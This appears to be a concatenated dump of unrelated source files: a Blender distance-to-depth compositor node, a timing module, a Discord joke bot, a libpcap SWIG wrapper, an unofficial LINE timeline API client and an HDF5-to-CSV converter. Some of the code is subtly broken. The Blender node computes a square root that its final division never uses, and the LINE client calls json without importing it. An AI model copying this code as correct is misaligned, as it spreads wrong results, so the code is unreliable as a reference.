}
import bpy
from nodeitems_utils import NodeItem, register_node_categories, unregister_node_categories
from nodeitems_builtins import CompositorNodeCategory
# Build intrinsic camera parameters from Blender camera data
#
# See notes on this in
# blender.stackexchange.com/questions/15102/what-is-blenders-camera-projection-matrix-model
def get_camera_intrinsics():
scene = bpy.context.scene
camera = scene.camera.data
f_in_mm = camera.lens
resolution_x_in_px = scene.render.resolution_x
resolution_y_in_px = scene.render.resolution_y
scale = scene.render.resolution_percentage / 100
sensor_width_in_mm = camera.sensor_width
sensor_height_in_mm = camera.sensor_height
pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
if (camera.sensor_fit == 'VERTICAL'):
# the sensor height is fixed (sensor fit is horizontal),
# the sensor width is effectively changed with the pixel aspect ratio
s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
s_v = resolution_y_in_px * scale / sensor_height_in_mm
else: # 'HORIZONTAL' and 'AUTO'
# the sensor width is fixed (sensor fit is horizontal),
# the sensor height is effectively changed with the pixel aspect ratio
pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
s_u = resolution_x_in_px * scale / sensor_width_in_mm
s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm
# Parameters of intrinsic calibration matrix
f_u = f_in_mm * s_u
f_v = f_in_mm * s_v
c_u = resolution_x_in_px * scale / 2
c_v = resolution_y_in_px * scale / 2
return resolution_x_in_px * scale, resolution_y_in_px * scale, f_u, f_v, c_u, c_v
class DistanceToDepth (bpy.types.CompositorNodeCustomGroup):
"""
Corrects blender depth maps (that are actually distance maps)
Calculates depth = dist / sqrt(1 + (x^2/fx^2) + (y^2/fy^2)))
"""
bl_name = 'DistanceToDepth'
bl_label = 'Distance to Depth'
def update_defaults(self):
for node in self.node_tree.nodes:
if node.label == 'x':
node.inputs[1].default_value = self.width
elif node.label == 'y':
node.inputs[1].default_value = self.height
elif node.label == 'x_to_cam':
node.inputs[1].default_value = self.c_x
elif node.label == 'y_to_cam':
node.inputs[1].default_value = self.c_y
elif node.label == 'x_over_f':
node.inputs[1].default_value = self.f_x * self.f_x
elif node.label == 'y_over_f':
node.inputs[1].default_value = self.f_y * self.f_y
def update_intrinsics(self, context):
self.update_defaults()
def set_intrinsics_from_blender(self, context):
self.width, self.height, self.f_x, self.f_y, self.c_x, self.c_y = get_camera_intrinsics()
self.update_defaults()
def read_update_from_blender(self):
return False
def write_update_from_blender(self, value):
pass
width: bpy.props.FloatProperty(
name="width", description="image width", update=update_intrinsics)
height: bpy.props.FloatProperty(
name="height", description="image height", update=update_intrinsics)
f_x: bpy.props.FloatProperty(
name="f_x", description="x focal length", update=update_intrinsics)
f_y: bpy.props.FloatProperty(
name="f_y", description="y focal length", update=update_intrinsics)
c_x: bpy.props.FloatProperty(
name="c_x", description="princial point x", update=update_intrinsics)
c_y: bpy.props.FloatProperty(
name="c_y", description="princial point y", update=update_intrinsics)
update_from_blender: bpy.props.BoolProperty(name="update_from_blender",
description="Read the parameters from Blender", update=set_intrinsics_from_blender,
set=write_update_from_blender, get=read_update_from_blender)
def draw_buttons(self, context, layout):
row = layout.row()
row.prop(self, 'width', text='width')
row = layout.row()
row.prop(self, 'height', text='height')
row = layout.row()
row.prop(self, 'f_x', text='f_x')
row = layout.row()
row.prop(self, 'f_y', text='f_y')
row = layout.row()
row.prop(self, 'c_x', text='c_x')
row = layout.row()
row.prop(self, 'c_y', text='c_y')
row = layout.row()
row.prop(self, 'update_from_blender', text='get from blender')
def init(self, context):
self.node_tree = bpy.data.node_groups.new(
self.bl_name, 'CompositorNodeTree')
group_inputs = self.node_tree.nodes.new('NodeGroupInput')
group_outputs = self.node_tree.nodes.new('NodeGroupOutput')
self.node_tree.inputs.new('NodeSocketFloat', 'Distance')
self.node_tree.outputs.new('NodeSocketFloat', 'Depth')
# init position texture
# Blender compositor has no default way to get the coordinates of the currently processed pixel.
# But one can create a texture that holds the x an y coordinates in its R and G channel, respectively.
tex = bpy.data.textures.new(name="Position", type="NONE")
tex.use_nodes = True
tex.node_tree.nodes.clear()
coordinates = tex.node_tree.nodes.new("TextureNodeCoordinates")
output = tex.node_tree.nodes.new("TextureNodeOutput")
tex.node_tree.links.new(coordinates.outputs[0], output.inputs['Color'])
texture_node = self.node_tree.nodes.new('CompositorNodeTexture')
texture_node.texture = tex
sep_rgba = self.node_tree.nodes.new('CompositorNodeSepRGBA')
self.node_tree.links.new(texture_node.outputs[1], sep_rgba.inputs[0])
# convert image coordinates to camera coordinates
x = self.node_tree.nodes.new('CompositorNodeMath')
x.label = "x"
x.operation = 'MULTIPLY'
self.node_tree.links.new(sep_rgba.outputs['R'], x.inputs[0])
x.inputs[1].default_value = self.width
y = self.node_tree.nodes.new('CompositorNodeMath')
y.label = "y"
y.operation = 'MULTIPLY'
self.node_tree.links.new(sep_rgba.outputs['G'], y.inputs[0])
y.inputs[1].default_value = self.height
x_to_cam = self.node_tree.nodes.new('CompositorNodeMath')
x_to_cam.label = "x_to_cam"
x_to_cam.operation = 'SUBTRACT'
self.node_tree.links.new(x.outputs[0], x_to_cam.inputs[0])
x_to_cam.inputs[1].default_value = self.c_x
y_to_cam = self.node_tree.nodes.new('CompositorNodeMath')
y_to_cam.label = "y_to_cam"
y_to_cam.operation = 'SUBTRACT'
self.node_tree.links.new(y.outputs[0], y_to_cam.inputs[0])
y_to_cam.inputs[1].default_value = self.c_y
# calculate 1 + (x^2/fx^2) + (y^2/fy^2)
sqr_x = self.node_tree.nodes.new('CompositorNodeMath')
sqr_x.operation = 'MULTIPLY'
self.node_tree.links.new(x_to_cam.outputs[0], sqr_x.inputs[0])
self.node_tree.links.new(x_to_cam.outputs[0], sqr_x.inputs[1])
sqr_y = self.node_tree.nodes.new('CompositorNodeMath')
sqr_y.operation = 'MULTIPLY'
self.node_tree.links.new(y_to_cam.outputs[0], sqr_y.inputs[0])
self.node_tree.links.new(y_to_cam.outputs[0], sqr_y.inputs[1])
x_over_f = self.node_tree.nodes.new('CompositorNodeMath')
x_over_f.label = "x_over_f"
x_over_f.operation = 'DIVIDE'
self.node_tree.links.new(sqr_x.outputs[0], x_over_f.inputs[0])
x_over_f.inputs[1].default_value = self.f_x * self.f_x
y_over_f = self.node_tree.nodes.new('CompositorNodeMath')
y_over_f.label = "y_over_f"
y_over_f.operation = 'DIVIDE'
self.node_tree.links.new(sqr_y.outputs[0], y_over_f.inputs[0])
y_over_f.inputs[1].default_value = self.f_y * self.f_y
one_plus_x = self.node_tree.nodes.new('CompositorNodeMath')
one_plus_x.operation = 'ADD'
one_plus_x.inputs[0].default_value = 1.0
self.node_tree.links.new(x_over_f.outputs[0], one_plus_x.inputs[1])
one_plus_x_plus_y = self.node_tree.nodes.new('CompositorNodeMath')
one_plus_x_plus_y.operation = 'ADD'
self.node_tree.links.new(
one_plus_x.outputs[0], one_plus_x_plus_y.inputs[0])
self.node_tree.links.new(y_over_f.outputs[0], one_plus_x_plus_y.inputs[1])
sqrt = self.node_tree.nodes.new('CompositorNodeMath')
sqrt.operation = 'SQRT'
self.node_tree.links.new(one_plus_x_plus_y.outputs[0], sqrt.inputs[0])
# calulate final result
dist_over_ellipse = self.node_tree.nodes.new('CompositorNodeMath')
dist_over_ellipse.operation = 'DIVIDE'
self.node_tree.links.new(
group_inputs.outputs['Distance'], dist_over_ellipse.inputs[0])
self.node_tree.links.new(
one_plus_x_plus_y.outputs[0], dist_over_ellipse.inputs[1])
self.node_tree.links.new(
dist_over_ellipse.outputs[0], group_outputs.inputs['Depth'])
def copy(self, node):
self.node_tree = node.node_tree.copy()
self.sep_rgba = node.sep_rgba
self.group_inputs = node.group_inputs
def free(self):
bpy.data.node_groups.remove(self.node_tree, do_unlink=True)
def register():
bpy.utils.register_class(DistanceToDepth)
newcatlist = [CompositorNodeCategory("CN_CV", "Computer Vision", items=[
NodeItem("DistanceToDepth")])]
register_node_categories("COMPUTER_VISION", newcatlist)
def unregister():
try:
unregister_node_categories("COMPUTER_VISION")
bpy.utils.unregister_class(DistanceToDepth)
except:
pass
```
#### File: src/tools/distance2Depth.py
```python
import numpy as np
class CDistance2Depth(object):
"""docstring for CDistance2Depth"""
def __init__(self, arg):
super(CDistance2Depth, self).__init__()
self.arg = arg
# focal length
self._f_px = np.zeros((2)) # f_x and f_y [px]
self._f_mm = np.zeros((2)) # f_x and f_y [mm]
# central point
self._c_px = np.zeros((2)) # c_x and c_y [px]
self._c_mm = np.zeros((2)) # c_x and c_y [mm]
# baseline
self._b_px = 0.0 # baseline [px]
self._b_px = 0.0 # baseline [mm]
def setupNodes(self):
pass
def setCameraParameters(self,params):
pass
def getDepthFromDistance(self, distanceImage):
pass
def getDisparityFromDistance(self, distanceImage):
pass
```
#### File: src/tools/timing_module.py
```python
import time
import TerrainStageSimulator.src.color_print as TCpr
#from tabulate import tabulate
####################################################################
# timingDict:
# timingDict['[self._className]_[name]'] = {minTime, maxTime, avgTime, numSamples, accumlatedTime, newTic, ticTime}
####################################################################
class CTimingModule():
"""docstring for CTimingModule"""
def __init__(self):
super(CTimingModule, self).__init__()
def _initTiming(self,name):
self._className = name
self._timingDict = {}
self._timingTables = []
def _tic(self,name):
# get current time
now = time.time()
# build up name of key
keyName = self._className + '_' + name
# check if entry of key already exist
if keyName in self._timingDict.keys():
self._timingDict[keyName]['newTic'] = True
self._timingDict[keyName]['ticTime'] = now
else:
# new entry
self._timingSample = {}
self._timingSample['numSamples'] = 0
self._timingSample['newTic'] = True
self._timingSample['ticTime'] = now
self._timingDict[keyName] = self._timingSample
def _toc(self,name):
# get current time
now = time.time()
# build up name of key
keyName = self._className + '_' + name
# check if entry of key already exist
if keyName in self._timingDict.keys():
# check of tic was called before toc
if self._timingDict[keyName]['newTic']:
# calc delta time
deltaTime = now - self._timingDict[keyName]['ticTime']
# min time ####################################################
if 'minTime' in self._timingDict[keyName].keys():
if deltaTime < self._timingDict[keyName]['minTime']:
self._timingDict[keyName]['minTime'] = deltaTime
else:
self._timingDict[keyName]['minTime'] = deltaTime
#############################################################
# max time ####################################################
if 'maxTime' in self._timingDict[keyName].keys():
if deltaTime > self._timingDict[keyName]['maxTime']:
self._timingDict[keyName]['maxTime'] = deltaTime
else:
self._timingDict[keyName]['maxTime'] = deltaTime
#############################################################
# average time ####################################################
self._timingDict[keyName]['numSamples'] += 1
if 'average' in self._timingDict[keyName].keys():
self._timingDict[keyName]['accumlatedTime'] += deltaTime
self._timingDict[keyName]['average'] = self._timingDict[keyName]['accumlatedTime']/self._timingDict[keyName]['numSamples']
else:
self._timingDict[keyName]['average'] = deltaTime
self._timingDict[keyName]['accumlatedTime'] = deltaTime
#############################################################
# clean up ##################
self._timingDict[keyName]['newTic'] = False
self._timingDict[keyName]['ticTime'] = -1
##################
else:
print('ERROR: call tic before toc!')
else:
print('ERROR: call tic before toc!')
def get_timing(self):
return self._timingDict
def _add_new_timing_table(self,newTimingTable):
self._timingTables.append(newTimingTable)
def _print_timing_tables(self):
# add own timing table
self._timingTables.append(self._timingDict)
# header for tables
timingHeaders=['timingAgent', 'avgTime[sec]', 'minTime[sec]', 'maxTime[sec]', 'numSamples']
# go through timing tables and print timing information
TCpr.prOrange('##### Timming Tables ####################################################################\n')
for tableEntry in self._timingTables:
# go through timing agents of entry of timing table
tableRows = []
for key in tableEntry:
print("key: ", key)
print("tableEntry[key]['average']: ", tableEntry[key]['average'])
print("tableEntry[key]['minTime']: ", tableEntry[key]['minTime'])
print("tableEntry[key]['maxTime']: ", tableEntry[key]['maxTime'])
print("tableEntry[key]['numSamples']: ", tableEntry[key]['numSamples'])
#tableSingleRow = [key ,tableEntry[key]['average'], tableEntry[key]['minTime'], tableEntry[key]['maxTime'], tableEntry[key]['numSamples']]
#tableRows.append(tableSingleRow)
# print table
#TCpr.prOrange(tabulate(tableRows,headers=timingHeaders))
TCpr.prOrange('##########################################################################################\n')
``` |
{
"source": "5U55/DadBot",
"score": 3
} |
#### File: 5U55/DadBot/main.py
```python
import discord, os, random
from keep_alive import keep_alive
client = discord.Client()
reprimainds = ['Language ', 'We don\'t use that language in this household ', 'Watch your mouth ', 'Hey, watch your language ']
@client.event
async def on_ready():
print('we have logged in as {0.user}'.format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
if 'i am ' in message.content.lower():
await message.channel.send('Hi '+message.content[message.content.lower().index('i am ')+5:len(message.content)]+' I\'m Dad')
if 'i\'m ' in message.content.lower():
await message.channel.send('Hi '+message.content[message.content.lower().index('i\'m ')+4:len(message.content)]+' I\'m Dad')
if 'im ' in message.content.lower():
if message.content.lower().index('im ') == 0 or message.content[message.content.lower().index('im ')-1] == ' ':
await message.channel.send('Hi '+message.content[message.content.lower().index('im ')+3:len(message.content)]+' I\'m Dad')
if message.content.lower() == 'hell':
await message.channel.send(random.choice(reprimainds)+'{}'.format(message.author.display_name))
if message.content.lower() == 'heck':
await message.channel.send(random.choice(reprimainds)+'{}'.format(message.author.display_name))
if message.content.lower() == 'damn':
await message.channel.send(random.choice(reprimainds)+'{}'.format(message.author.display_name))
if message.content.lower() == 'shoot':
await message.channel.send(random.choice(reprimainds)+'{}'.format(message.author.display_name))
if 'dad bot' in message.content.lower():
await message.channel.send('Yes, {} , you said my name?'.format(message.author.display_name))
if 'dad' in message.content.lower():
await message.channel.send('Yes, {} , you said my name?'.format(message.author.display_name))
if 'what\'s up' in message.content.lower():
await message.channel.send('The sky ;)')
if 'whats up' in message.content.lower():
await message.channel.send('The sky ;)')
if 'wassup' in message.content.lower():
await message.channel.send('The sky ;)')
keep_alive()
client.run(os.getenv('TOKEN'))
``` |
{
"source": "5u623l20/pylibpcap",
"score": 2
} |
#### File: 5u623l20/pylibpcap/pcap.py
```python
import _pcap
def _swig_setattr(self,class_type,name,value):
if (name == "this"):
if isinstance(value, class_type):
self.__dict__[name] = value.this
if hasattr(value,"thisown"): self.__dict__["thisown"] = value.thisown
del value.thisown
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
self.__dict__[name] = value
def _swig_getattr(self,class_type,name):
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError,name
import types
try:
_object = types.ObjectType
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
del types
__doc__ = _pcap.__doc__
for dltname, dltvalue in _pcap.DLT.items():
globals()[dltname] = dltvalue
class pcapObject(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, pcapObject, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, pcapObject, name)
def __repr__(self):
return "<C pcapObject instance at %s>" % (self.this,)
def __init__(self, *args):
_swig_setattr(self, pcapObject, 'this', _pcap.new_pcapObject(*args))
_swig_setattr(self, pcapObject, 'thisown', 1)
import sys
if sys.version[0]=='2':
self.datalink.im_func.__doc__ = _pcap.pcapObject_datalink.__doc__
self.fileno.im_func.__doc__ = _pcap.pcapObject_fileno.__doc__
self.datalinks.im_func.__doc__ = _pcap.pcapObject_datalinks.__doc__
self.major_version.im_func.__doc__ = _pcap.pcapObject_major_version.__doc__
self.minor_version.im_func.__doc__ = _pcap.pcapObject_minor_version.__doc__
self.stats.im_func.__doc__ = _pcap.pcapObject_stats.__doc__
self.getnonblock.im_func.__doc__ = _pcap.pcapObject_getnonblock.__doc__
self.open_live.im_func.__doc__ = _pcap.pcapObject_open_live.__doc__
self.dispatch.im_func.__doc__ = _pcap.pcapObject_dispatch.__doc__
self.setnonblock.im_func.__doc__ = _pcap.pcapObject_setnonblock.__doc__
self.is_swapped.im_func.__doc__ = _pcap.pcapObject_is_swapped.__doc__
self.open_dead.im_func.__doc__ = _pcap.pcapObject_open_dead.__doc__
self.dump_open.im_func.__doc__ = _pcap.pcapObject_dump_open.__doc__
self.next.im_func.__doc__ = _pcap.pcapObject_next.__doc__
self.open_offline.im_func.__doc__ = _pcap.pcapObject_open_offline.__doc__
self.snapshot.im_func.__doc__ = _pcap.pcapObject_snapshot.__doc__
self.loop.im_func.__doc__ = _pcap.pcapObject_loop.__doc__
self.setfilter.im_func.__doc__ = _pcap.pcapObject_setfilter.__doc__
def __del__(self, destroy=_pcap.delete_pcapObject):
try:
if self.thisown: destroy(self)
except: pass
def open_live(*args): return _pcap.pcapObject_open_live(*args)
def open_dead(*args): return _pcap.pcapObject_open_dead(*args)
def open_offline(*args): return _pcap.pcapObject_open_offline(*args)
def dump_open(*args): return _pcap.pcapObject_dump_open(*args)
def setnonblock(*args): return _pcap.pcapObject_setnonblock(*args)
def getnonblock(*args): return _pcap.pcapObject_getnonblock(*args)
def setfilter(*args): return _pcap.pcapObject_setfilter(*args)
def loop(*args): return _pcap.pcapObject_loop(*args)
def dispatch(*args): return _pcap.pcapObject_dispatch(*args)
def next(*args): return _pcap.pcapObject_next(*args)
def datalink(*args): return _pcap.pcapObject_datalink(*args)
def datalinks(*args): return _pcap.pcapObject_datalinks(*args)
def snapshot(*args): return _pcap.pcapObject_snapshot(*args)
def is_swapped(*args): return _pcap.pcapObject_is_swapped(*args)
def major_version(*args): return _pcap.pcapObject_major_version(*args)
def minor_version(*args): return _pcap.pcapObject_minor_version(*args)
def stats(*args): return _pcap.pcapObject_stats(*args)
def fileno(*args): return _pcap.pcapObject_fileno(*args)
class pcapObjectPtr(pcapObject):
def __init__(self, this):
_swig_setattr(self, pcapObject, 'this', this)
if not hasattr(self,"thisown"): _swig_setattr(self, pcapObject, 'thisown', 0)
_swig_setattr(self, pcapObject,self.__class__,pcapObject)
_pcap.pcapObject_swigregister(pcapObjectPtr)
lookupdev = _pcap.lookupdev
findalldevs = _pcap.findalldevs
lookupnet = _pcap.lookupnet
aton = _pcap.aton
ntoa = _pcap.ntoa
``` |
{
"source": "5un60k0n9/sidqy",
"score": 2
} |
#### File: LINEZX/Api/channel.py
```python
import requests
from thrift.transport import THttpClient
from thrift.protocol import TCompactProtocol
from .config import Config
from tcr import ChannelService
from tcr.ttypes import *
import tempfile
class Channel(Config):
client = None
authToken = None
mid = None
channel_access_token = None
token = None
obs_token = None
refresh_token = None
def __init__(self, authToken,mid):
Config.__init__(self)
self.mid = mid
self.authToken = authToken
self.transport = THttpClient.THttpClient(self.LINE_HOST_DOMAIN, None, self.LINE_API_QUERY_PATH_FIR)
self.transport.path = self.LINE_AUTH_QUERY_PATH
self.transport.setCustomHeaders({"X-Line-Application" : self.APP_NAME,"User-Agent" : self.USER_AGENT,"X-Line-Access": authToken})
self.transport.open()
self.protocol = TCompactProtocol.TCompactProtocol(self.transport)
self.client = ChannelService.Client(self.protocol)
self.transport.path = self.LINE_CHAN_QUERY_PATH
def login(self):
result = self.client.issueChannelToken("<PASSWORD>")
self.channel_access_token = result.channelAccessToken
self.token = result.token
self.obs_token = result.obsToken
self.refresh_token = result.refreshToken
def new_post(self, text):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"postInfo" : { "readPermission" : { "type" : "ALL" } },
"sourceType" : "TIMELINE",
"contents" : { "text" : text }
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/create.json",
headers = header,
data = json.dumps(payload)
)
return r.json()
def postPhoto(self,text,path):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"postInfo" : { "readPermission" : { "type" : "ALL" } },
"sourceType" : "TIMELINE",
"contents" : { "text" : text ,"media" : [{u'objectId': u'F57144CF9ECC4AD2E162E68554D1A8BD1a1ab0t04ff07f6'}]}
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/create.json",
headers = header,
data = json.dumps(payload)
)
return r.json()
def like(self, mid, postid, likeType=1001):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"likeType" : likeType,
"activityExternalId" : postid,
"actorId" : mid
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/like/create.json?homeId=" + mid,
headers = header,
data = json.dumps(payload)
)
return r.json()
def comment(self, mid, postid, text):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"commentText" : text,
"activityExternalId" : postid,
"actorId" : mid
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/comment/create.json?homeId=" + mid,
headers = header,
data = json.dumps(payload)
)
return r.json()
def activity(self, limit=20):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/tl/mapi/v39/activities?postLimit=" + str(limit),
headers = header
)
return r.json()
def getAlbum(self, gid):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct": self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/mh/album/v3/albums?type=g&sourceType=TALKROOM&homeId=" + gid,
headers = header
)
return r.json()
def changeAlbumName(self,gid,name,albumId):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct": self.channel_access_token,
}
payload = {
"title": name
}
r = requests.put(self.LINE_HOST_DOMAIN + "/mh/album/v3/album/" + albumId + "?homeId=" + gid,
headers = header,
data = json.dumps(payload),
)
return r.json()
def deleteAlbum(self,gid,albumId):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct": self.channel_access_token,
}
r = requests.delete(self.LINE_HOST_DOMAIN + "/mh/album/v3/album/" + albumId + "?homeId=" + gid,
headers = header,
)
return r.json()
def getNote(self,gid, commentLimit, likeLimit):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct": self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/list.json?homeId=" + gid + "&commentLimit=" + commentLimit + "&sourceType=TALKROOM&likeLimit=" + likeLimit,
headers = header
)
return r.json()
def postNote(self, gid, text):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {"postInfo":{"readPermission":{"homeId":gid}},
"sourceType":"GROUPHOME",
"contents":{"text":text}
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/create.json",
headers = header,
data = json.dumps(payload)
)
return r.json()
def getDetail(self, mid):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/ma/api/v1/userpopup/getDetail.json?userMid=" + mid,
headers = header
)
return r.json()
def getHome(self,mid):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/list.json?homeId=" + mid + "&commentLimit=2&sourceType=LINE_PROFILE_COVER&likeLimit=6",
headers = header
)
return r.json()
def getCover(self,mid):
h = self.getHome(mid)
objId = h["result"]["homeInfo"]["objectId"]
return "http://dl.profile.line-cdn.net/myhome/c/download.nhn?userid=" + mid + "&oid=" + objId
def createAlbum(self,gid,name):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"type" : "image",
"title" : name
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/album/v3/album?count=1&auto=0&homeId=" + gid,
headers = header,
data = json.dumps(payload)
)
return r.json()
def createAlbum2(self,gid,name,path,oid):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"type" : "image",
"title" : name
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/album/v3/album?count=1&auto=0&homeId=" + gid,
headers = header,
data = json.dumps(payload)
)
``` |
{
"source": "5un/Million-Song-Dataset-HDF5-to-CSV",
"score": 3
} |
#### File: 5un/Million-Song-Dataset-HDF5-to-CSV/msdHDF5toCSV.py
```python
import sys
import os
import glob
import hdf5_getters
import re
class Song:
songCount = 0
# songDictionary = {}
def __init__(self, songID):
self.id = songID
Song.songCount += 1
# Song.songDictionary[songID] = self
self.albumName = None
self.albumID = None
self.artistID = None
self.artistLatitude = None
self.artistLocation = None
self.artistLongitude = None
self.artistFamiliarity = None
self.artistHotttnesss = None
self.artistName = None
self.artistMBTags = None
self.artistMBTagsCount = None
self.artistTerms = None
self.danceability = None
self.energy = None
self.duration = None
self.genreList = []
self.keySignature = None
self.keySignatureConfidence = None
self.loudness = None
self.mode = None
self.lyrics = None
self.popularity = None
self.hotttnesss = None
self.tempo = None
self.timeSignature = None
self.timeSignatureConfidence = None
self.title = None
self.year = None
def displaySongCount(self):
print "Total Song Count %i" % Song.songCount
def displaySong(self):
print "ID: %s" % self.id
def main():
outputFileName = sys.argv[2]
outputFile1 = open(outputFileName, 'w')
csvRowString = ""
#################################################
#if you want to prompt the user for the order of attributes in the csv,
#leave the prompt boolean set to True
#else, set 'prompt' to False and set the order of attributes in the 'else'
#clause
prompt = False
#################################################
if prompt == True:
while prompt:
prompt = False
csvAttributeString = raw_input("\n\nIn what order would you like the colums of the CSV file?\n" +
"Please delineate with commas. The options are: " +
"AlbumName, AlbumID, ArtistID, ArtistLatitude, ArtistLocation, ArtistLongitude,"+
" ArtistName, Danceability, Duration, KeySignature, KeySignatureConfidence, Tempo," +
" SongID, TimeSignature, TimeSignatureConfidence, Title, and Year.\n\n" +
"For example, you may write \"Title, Tempo, Duration\"...\n\n" +
"...or exit by typing 'exit'.\n\n")
csvAttributeList = re.split('\W+', csvAttributeString)
for i, v in enumerate(csvAttributeList):
csvAttributeList[i] = csvAttributeList[i].lower()
for attribute in csvAttributeList:
# print "Here is the attribute: " + attribute + " \n"
if attribute == 'AlbumID'.lower():
csvRowString += 'AlbumID'
elif attribute == 'AlbumName'.lower():
csvRowString += 'AlbumName'
elif attribute == 'ArtistID'.lower():
csvRowString += 'ArtistID'
elif attribute == 'ArtistLatitude'.lower():
csvRowString += 'ArtistLatitude'
elif attribute == 'ArtistLocation'.lower():
csvRowString += 'ArtistLocation'
elif attribute == 'ArtistLongitude'.lower():
csvRowString += 'ArtistLongitude'
elif attribute == 'ArtistName'.lower():
csvRowString += 'ArtistName'
elif attribute == 'Danceability'.lower():
csvRowString += 'Danceability'
elif attribute == 'Duration'.lower():
csvRowString += 'Duration'
elif attribute == 'KeySignature'.lower():
csvRowString += 'KeySignature'
elif attribute == 'KeySignatureConfidence'.lower():
csvRowString += 'KeySignatureConfidence'
elif attribute == 'SongID'.lower():
csvRowString += "SongID"
elif attribute == 'Tempo'.lower():
csvRowString += 'Tempo'
elif attribute == 'TimeSignature'.lower():
csvRowString += 'TimeSignature'
elif attribute == 'TimeSignatureConfidence'.lower():
csvRowString += 'TimeSignatureConfidence'
elif attribute == 'Title'.lower():
csvRowString += 'Title'
elif attribute == 'Year'.lower():
csvRowString += 'Year'
elif attribute == 'Exit'.lower():
sys.exit()
else:
prompt = True
print "=============="
print "I believe there has been an error with the input."
print "=============="
break
csvRowString += ","
lastIndex = len(csvRowString)
csvRowString = csvRowString[0:lastIndex-1]
csvRowString += "\n"
outputFile1.write(csvRowString);
csvRowString = ""
#else, if you want to hard code the order of the csv file and not prompt
#the user,
else:
#################################################
#change the order of the csv file here
#Default is to list all available attributes (in alphabetical order)
csvRowString = ("SongID,AlbumID,AlbumName,ArtistID,ArtistLatitude,ArtistLocation,"+
"ArtistLongitude,ArtistFamiliarity,ArtistHotttnesss,ArtistName,"+
"ArtistMBTags,ArtistTerms,"+
"Danceability,Energy,Duration,KeySignature,"+
"KeySignatureConfidence,Loudness,Mode,Hotttnesss,Tempo,TimeSignature,TimeSignatureConfidence,"+
"Title,Year")
#################################################
csvAttributeList = re.split('\W+', csvRowString)
for i, v in enumerate(csvAttributeList):
csvAttributeList[i] = csvAttributeList[i].lower()
outputFile1.write("SongNumber,");
outputFile1.write(csvRowString + "\n");
csvRowString = ""
#################################################
#Set the basedir here, the root directory from which the search
#for files stored in a (hierarchical data structure) will originate
basedir = sys.argv[1] # "." As the default means the current directory
ext = ".h5" #Set the extension here. H5 is the extension for HDF5 files.
#################################################
#FOR LOOP
for root, dirs, files in os.walk(basedir):
files = glob.glob(os.path.join(root,'*'+ext))
for f in files:
print f
songH5File = hdf5_getters.open_h5_file_read(f)
song = Song(str(hdf5_getters.get_song_id(songH5File)))
testDanceability = hdf5_getters.get_danceability(songH5File)
# print type(testDanceability)
# print ("Here is the danceability: ") + str(testDanceability)
song.artistID = str(hdf5_getters.get_artist_id(songH5File))
song.albumID = str(hdf5_getters.get_release_7digitalid(songH5File))
song.albumName = str(hdf5_getters.get_release(songH5File))
song.artistLatitude = str(hdf5_getters.get_artist_latitude(songH5File))
song.artistLocation = str(hdf5_getters.get_artist_location(songH5File))
song.artistLongitude = str(hdf5_getters.get_artist_longitude(songH5File))
song.artistFamiliarity = str(hdf5_getters.get_artist_familiarity(songH5File))
song.artistHotttnesss = str(hdf5_getters.get_artist_hotttnesss(songH5File))
song.artistName = str(hdf5_getters.get_artist_name(songH5File))
song.artistMBTags = ','.join(hdf5_getters.get_artist_mbtags(songH5File))
# song.artistMBTagsCount = ','.join(hdf5_getters.get_artist_mbtags_count(songH5File))
song.artistTerms = ','.join(hdf5_getters.get_artist_terms(songH5File))
song.danceability = str(hdf5_getters.get_danceability(songH5File))
song.energy = str(hdf5_getters.get_energy(songH5File))
song.duration = str(hdf5_getters.get_duration(songH5File))
